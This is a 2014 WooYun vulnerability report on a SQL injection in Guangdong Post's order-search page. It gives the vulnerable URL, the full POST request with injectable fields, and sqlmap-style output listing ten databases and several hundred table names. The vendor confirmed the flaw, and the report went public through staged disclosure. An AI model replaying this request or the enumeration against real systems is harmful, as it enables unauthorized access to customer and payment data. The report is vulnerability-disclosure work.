当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077630

漏洞标题:广东邮政SQL注射超大量数据库

相关厂商:中国邮政集团公司信息技术局

漏洞作者: 紫霞仙子

提交时间:2014-09-28 15:32

修复时间:2014-11-12 15:34

公开时间:2014-11-12 15:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-28: 细节已通知厂商并且等待厂商处理中
2014-09-28: 厂商已经确认,细节仅向厂商公开
2014-10-08: 细节向核心白帽子及相关领域专家公开
2014-10-18: 细节向普通白帽子公开
2014-10-28: 细节向实习白帽子公开
2014-11-12: 细节向公众公开

简要描述:

邮政!!

详细说明:

数据量太大了,第一个就四百多张表,吓死了。

漏洞证明:

http://www.183.gd.cn/Order/SearchOrder.aspx 
post  data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDw3NzM1ODYxMTt0PDtsPGk8MT47PjtsPHQ8O2
w8aTwxPjtpPDEyPjtpPDEzPjtpPDI3Pjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PDtsPGk8Mj47PjtsPH
Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47Pj47Pj47dDxwPHA8bDxFbmFibGVkOz47bDxvPGY%2B
Oz4%2BOz47Oz47dDxwPHA8bDxFbmFibGVkOz47bDxvPGY%2BOz4%2BOz47Oz47dDxAMDw7Ozs7Ozs7Oz
s7Pjs7Pjs%2BPjs%2BPjtsPFJhZGlvQnV0dG9uMTtSYWRpb0J1dHRvbjE7UmFkaW9CdXR0b24yO1JhZG
lvQnV0dG9uMjs%2BPru5DFzRafRQmm5yZyyThYEdvRQq&g1=RadioButton1&txtuserpsw=88952634
&txtID=88952634&DeliverEmsNo=88952634&txtName=88952634&btnFind=Button&txtusernam
e=88952634"
available databases [10]:
[*] 183dbnew
[*] GDYXDB
[*] LabourUnion
[*] master
[*] model
[*] msdb
[*] phone_fee
[*] tempdb
[*] test
[*] xcxt
这里贴出一部分。
| Opr_Group                             |
| OrderBase                             |
| OrderBase1                            |
| OrderBase20100520                     |
| OrderBase20100819                     |
| OrderBaseStatusChange                 |
| OrderBase_bak                         |
| OrderCreditInfo                       |
| OrderInterfaceLog                     |
| OrderInvoice                          |
| OrderItem                             |
| OrderItem1                            |
| OrderLog                              |
| OrderManageConditionDetail            |
| OrderManageRule                       |
| OrderManager                          |
| OrderModifyTime                       |
| OrderMsg                              |
| OrderStatus20100520                   |
| OrderStatusbak                        |
| OrderbaseEmsNo                        |
| OrganBaseInfo                         |
| OrganExtraInfo                        |
| OrganPayMethod                        |
| OrganTemplet                          |
| OrganType                             |
| Organ_Page                            |
| Organ_T_AIRLINE_BOOK                  |
| Organ_Type                            |
| Package_ShipFee                       |
| PageCode                              |
| PageCode100601                        |
| PageCode100803                        |
| PageCode20100520                      |
| PageCode20110106                      |
| PageCodebak                           |
| PageModel                             |
| Page_Func                             |
| Paper                                 |
| PayMode                               |
| PayMode20100819                       |
| PayMode20100909                       |
| PayResult                             |
| Pay_Order                             |
| Paymode_SaleRule                      |
| Plane                                 |
| PointSetting                          |
| PostCode                              |
| PreBook                               |
| Present                               |
| PresentPoint                          |
| Probability                           |
| ProductCriticism                      |
| ProductStage                          |
| Provider                              |
| PrtMsg                                |
| Publish                               |
| RPT_BusinessDaily                     |
| RPT_ShowTicketInfo                    |
| RecommendInfo                         |
| RecommendMatter                       |
| RemitMoney                            |
| RetTicketLog                          |
| RetTicketRecord                       |
| ReturnGoodsRuleInfo                   |
| ReturnMatterLog                       |
| RoadSiteCity                          |
| RoadSiteCitybak                       |
| Rpt_InsurBillDetail                   |
| SMSetting                             |
| STK                                   |
| STK_Log                               |
| SaleChannel                           |
| SaleRuleInfo                          |
| SelfMail                              |
| Series                                |
| Service                               |
| SetOrderTime                          |
| ShipMode                              |
| ShipRuleBase                          |
| ShipRuleInfo                          |
| ShortMessage                          |
| ShowInfo                              |
| ShowLocation                          |
| ShowMessage                           |
| ShowTicketInfo                        |
| ShowTicketInfobak                     |
| ShowTicketRptInfoDate                 |
| ShowZhuHaiHangZhang                   |
| Stamp                                 |
| StampType                             |
| StockMessage                          |
| SystemMatterCode                      |
| SystemMatterType                      |
| T_AIRLINE_BOOK                        |
| T_AIRLINE_CODE                        |
| T_CITY_CODE                           |
| T_INTERCITY                           |
| TbCustPayMode                         |
| TbPayCust                             |
| TbPayOrderInfo                        |
| Tb_Public_City                        |
| TempEMSNo                             |
| TempOrder                             |
| TempOrderlog                          |
| TempOrderlogbak                       |
| TempletType                           |
| TotalOrder                            |
| TrainOrderItem                        |
| TrainTicketOrder                      |
| TrainTicketOrderItem                  |
| TraveClass                            |
| TraveProduct                          |
| TraveTicket                           |
| TravelGroup                           |
| TravelGroupAttendInfo                 |
| TravelGroup_TravelSite                |
| TravelLine                            |
| TravelPauseDate                       |
| TravelSite                            |
| TravelType                            |
| UserAddress                           |
| UserBaseInfo                          |
| UserExtraInfo                         |
| UserFavour                            |
| V_GetDate                             |
| V_VoucherMessage                      |
| View_183AndXhDzTicket                 |
| View_183SaleData                      |
| View_BulletinSearch                   |
| View_CartShowTicket                   |
| View_ChuPiaoSearch                    |
| View_ClassSort                        |
| View_CountChuPiao                     |
| View_CountTicketPay                   |
| View_CountTraveTicket                 |
| View_DiaoBoLiShi                      |
| View_EVoucherPayOrderReport           |
| View_EditMemberLog                    |
| View_GetUploadMoonCakeOrders          |
| View_GetUploadMoonCakeOrders20100909  |
| View_JiaoYiMingXiLog                  |
| View_Matter                           |
| View_MatterDept                       |
| View_MemberExchangePoint              |
| View_MemberOrder                      |
| View_MemberOrderBase                  |
| View_MemberOrderGetPoint              |
| View_MemberSecondOrderSearch          |
| View_MemeberOrderSearch               |
| View_NAFamilyReport                   |
| View_NotInMemOrderBase                |
| View_NotInMemOrderItem                |
| View_OrderBaseOver                    |
| View_OrderBasePayed                   |
| View_OrderCommCount                   |
| View_OrderCount                       |
| View_OrderCount20110106               |
| View_OrderCountReport                 |
| View_OrderCreditInfo                  |
| View_OrderInvoice                     |
| View_OrderItemOver                    |
| View_OrderReportAddEVoucher           |
| View_OrganBaseInfo                    |
| View_PayCust                          |
| View_PayOrderInfo                     |
| View_PayOrderReport                   |
| View_ProviderSearchTicket             |
| View_RealShowInfo                     |
| View_Search183Order                   |
| View_SearchBusinessPayMode            |
| View_SearchComplain                   |
| View_SearchMatterBase                 |
| View_SearchMatterBase20110106         |
| View_SearchMemberCashTicket           |
| View_SearchMemberEVoucher             |
| View_SearchOrderInfo                  |
| View_SearchOrderInfo20110427          |
| View_SearchOrganTemplet               |
| View_SearchPresent                    |
| View_SearchPresentPoint               |
| View_SearchProductStage               |
| View_SearchTraveProduct               |
| View_SearchTraveTicket                |
| View_SearchUndoOrderInfo              |
| View_ShowInfo                         |
| View_ShowTicketInfo                   |
| View_TBPayOrderInfoAndOut             |
| View_TicketBalanceReport              |
| View_TicketPay                        |
| View_TrainTicketPayResult             |
| View_UserSearch                       |
| View_VirtualCardItemDetailSystemNo    |
| View_Voucher                          |
| View_VoucherList                      |
| View_WuLiaoGuanLi                     |
| View_WuLiaoMingXi                     |
| View_XHOrderOpr                       |
| View_XinYongEDu                       |
| View_YeWuGuiZheGuanLi                 |
| VirtualCardBase                       |
| VirtualCardDept                       |
| VirtualCardItem                       |
| VisitMsg                              |
| VisitRecord                           |
| VoucherConfig                         |
| VoucherItem                           |
| VoucherLog                            |
| VoucherType                           |
| VoucherTypeBind                       |
| WalletInfo                            |
| WangDianXianE                         |
| WebMsg                                |
| WorkBusiness                          |
| XhOrderOpr                            |
| XinWen                                |
| XinYongEDu                            |
| XinYongEDubak                         |
| YiDiJieSuan                           |
| YinHangLiuShui                        |
| YinHangOrganID                        |
| YouHuiMingXi                          |
| 183dbuserxx.D99_CMD                   |
| 183dbuserxx.D99_REG                   |
| 183dbuserxx.D99_Tmp                   |
| 183dbuserxx.JCZ3Tmp                   |
| 183dbuserxx.MatterBase_XX             |
| 183dbuserxx.OrderBase20110427         |
| 183dbuserxx.cmd                       |
| 183dbuserxx.comd_list                 |
| 183dbuserxx.jiaozhu                   |
| 183dbuserxx.kill_kkbak                |
| 183dbuserxx.userbaseinfo_bak20110124  |
| 183dbuserxx.userextrainfo_bak20110124 |
| 183dbuserxx.voucherbak                |
| account                               |
| airport_airline_book                  |
| bbs1                                  |
| board                                 |
| bookmark                              |
| bookticket                            |
| cart                                  |
| cartbak                               |
| cin***                                |
| class                                 |
| config                                |
| dtproperties                          |
| eticket_kh_book                       |
| featureplan                           |
| featureprice                          |
| fly_bendi_user                        |
| flygongsi                             |
| flyjixing                             |
| flyshiju                              |
| hall                                  |
| kehu_info                             |
| kh_inf                                |
| kh_trade                              |
| lykp***                               |
| message                               |
| netportorder                          |
| notice                                |
| operaterorder                         |
| program                               |
| seat                                  |
| setwayvlue                            |
| t                                     |
| tbPayAddOnes                          |
| test                                  |
| texorder                              |
| ticket                                |
| user***                               |
| vcityorder                            |
| voucher                               |
| voucherRefound                        |
| vwCustRpt                             |
| vwMemb***                          |
| vwOrder                               |
| zhengce                               |

修复方案:

这要是被脱裤了,影响也太大了。

版权声明:转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-28 15:55

厂商回复:

谢谢!

最新状态:

暂无